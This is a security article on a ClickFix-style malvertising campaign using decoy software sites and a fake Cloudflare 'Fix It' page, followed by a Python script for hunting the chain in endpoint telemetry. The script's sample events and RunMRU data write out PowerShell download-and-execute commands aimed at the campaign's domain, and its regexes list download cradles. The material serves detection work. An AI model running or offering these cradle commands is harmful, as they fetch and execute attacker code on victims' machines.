Attackers have been observed running a social engineering campaign that uses clever but deceptive techniques to evade detection and manipulate users into compromising their own systems. The campaign combines malvertising and decoy websites imitating software brands with a fake Cloudflare notification.
Decoy landing pages imitating popular platforms and software, including Microsoft Teams, FileZilla, UltraViewer, CutePDF, and Advanced IP Scanner, used the same deceptive technique to manipulate users into executing malicious commands. Interestingly, researchers also encountered a lure built around a cruise booking site, although the reason for its inclusion remains unclear.
The campaign came to light during a Malwarebytes investigation triggered by a suspicious ad for “notepad” that appeared in search engine results. The lure was a seemingly legitimate website whose download button, instead of delivering a file, redirected to a fake Cloudflare verification page.
Unlike traditional CAPTCHA-style bot checks, this page displays a message claiming the browser cannot properly render an offline document and instructs the user to click a "Fix It" button. Clicking it silently writes a malicious PowerShell command to the clipboard. Further misleading instructions then tell the user to open the Windows Run dialog (Win+R), paste, and press Enter. The browser itself never downloads or runs anything; the user launches the command, which is why the approach sidesteps download warnings and browser-level protections.
Once executed, the PowerShell script downloads additional files from a remote domain (topsportracing[.]com). A sandbox analysis revealed that the script immediately fingerprints the infected system, accessing key directories and running commands.
The collected data is then transmitted to the attackers’ infrastructure through a Cloudflare Tunnel, a technique Proofpoint has previously documented in campaigns delivering remote access trojans (RATs). The final payload was not observed, but it is likely an infostealer or a RAT.
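As an added example (not Malwarebytes' code and not taken from the campaign), the following Python sketches how a SOC could hunt for this whole chain in endpoint telemetry: PowerShell spawned by explorer.exe (the parent process when a command is entered in the Run dialog) with a hidden window, an encoded command, or a download cradle; DNS lookups for the download domain named above or for Cloudflare quick-tunnel hostnames; and leftover entries in the user's RunMRU registry key, where Windows records what was typed into the Run dialog. The Sysmon-like event shape, the sample events, the RunMRU export, and the trycloudflare.com suffix (the page does not name the tunnel hostname) are assumptions made for this example.

```python
import base64
import re

# Constructed sample telemetry in a Sysmon-like shape; not real logs from the campaign.
# Events 0 and 1 model the Run-dialog launch (parent explorer.exe), event 2 is a benign
# script started the same way, events 3-4 model DNS lookups by the payload and a browser.
SAMPLE_EVENTS = [
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -ep bypass -c "iwr http://topsportracing.com/s.ps1 | iex"'},
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden -enc "
                     + base64.b64encode("irm http://topsportracing.com/x | iex".encode("utf-16-le")).decode()},
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -NoProfile -File C:\scripts\backup.ps1"},
    {"type": "dns", "image": "powershell.exe", "query": "tunnel-name-1234.trycloudflare.com"},
    {"type": "dns", "image": "chrome.exe", "query": "www.cloudflare.com"},
]

# Constructed RunMRU export (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU):
# every entry ends with the marker "\1" and MRUList orders the entries most-recent-first.
SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "irm http://topsportracing.com/x | iex"\\1',
}

HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
ENCODED = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|invoke-expression|iex|"
    r"downloadstring|downloadfile|net\.webclient|start-bitstransfer|curl|wget)\b", re.I)
# Assumption: quick tunnels live under trycloudflare.com; the page only says "Cloudflare tunnel".
TUNNEL_SUFFIX = ".trycloudflare.com"
REPORTED_DOMAINS = {"topsportracing.com"}  # download domain named in the report


def decode_encoded_command(command_line):
    """Return the UTF-16LE plaintext behind -e/-ec/-enc/-EncodedCommand, or None."""
    m = ENCODED.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def process_reasons(event):
    """Indicators for one process-creation event (empty if the process is not PowerShell)."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    visible = cmd + (" " + decoded if decoded else "")  # inspect decoded text as well
    reasons = []
    if event["parent_image"].lower().endswith("\\explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (Run dialog or shell launch)")
    if HIDDEN.search(cmd):
        reasons.append("hidden window requested")
    if decoded is not None:
        reasons.append("encoded command decodes to: " + decoded)
    if CRADLE.search(visible):
        reasons.append("download cradle / remote script execution")
    return reasons


def is_clickfix_like(event):
    """Explorer-launched PowerShell that also hides, encodes, or fetches code is flagged."""
    reasons = process_reasons(event)
    from_explorer = any(r.startswith("powershell spawned by explorer") for r in reasons)
    return from_explorer and len(reasons) > 1


def dns_reason(event):
    q = event["query"].lower().rstrip(".")
    if q in REPORTED_DOMAINS:
        return "download domain named in the report"
    if q.endswith(TUNNEL_SUFFIX):
        return "Cloudflare quick tunnel hostname (possible exfiltration channel)"
    return None


def runmru_commands(values):
    """Commands from a RunMRU export, most recent first, trailing '\\1' marker removed."""
    out = []
    for key in values.get("MRUList", ""):
        data = values.get(key)
        if data is not None:
            out.append(data[:-2] if data.endswith("\\1") else data)
    return out


def triage(events, runmru=None):
    """Suspicious event indices with reasons, plus RunMRU entries matching the lure pattern."""
    flagged = []
    for i, ev in enumerate(events):
        if ev["type"] == "process" and is_clickfix_like(ev):
            flagged.append((i, "; ".join(process_reasons(ev))))
        elif ev["type"] == "dns" and dns_reason(ev):
            flagged.append((i, dns_reason(ev)))
    pasted = [c for c in runmru_commands(runmru or {}) if HIDDEN.search(c) or CRADLE.search(c)]
    return {"events": flagged, "runmru": pasted}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS, SAMPLE_RUNMRU)
    for idx, why in result["events"]:
        print(f"event {idx}: {why}")
    for cmd in result["runmru"]:
        print("RunMRU: " + cmd)
```

The explorer.exe parent on its own is not evidence (event 2, a script double-clicked from Explorer, is left alone); the signal is the combination with a hidden window, an encoded argument, or a cradle, and the RunMRU key gives the incident responder the exact text the victim pasted even after the process telemetry has rolled over.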
This campaign is one of a growing number of social engineering schemes that use similar methods. Variants of this paste-and-run lure are tracked under names such as ClickFix and ClearFake, and they resemble earlier fake browser update campaigns like SocGholish.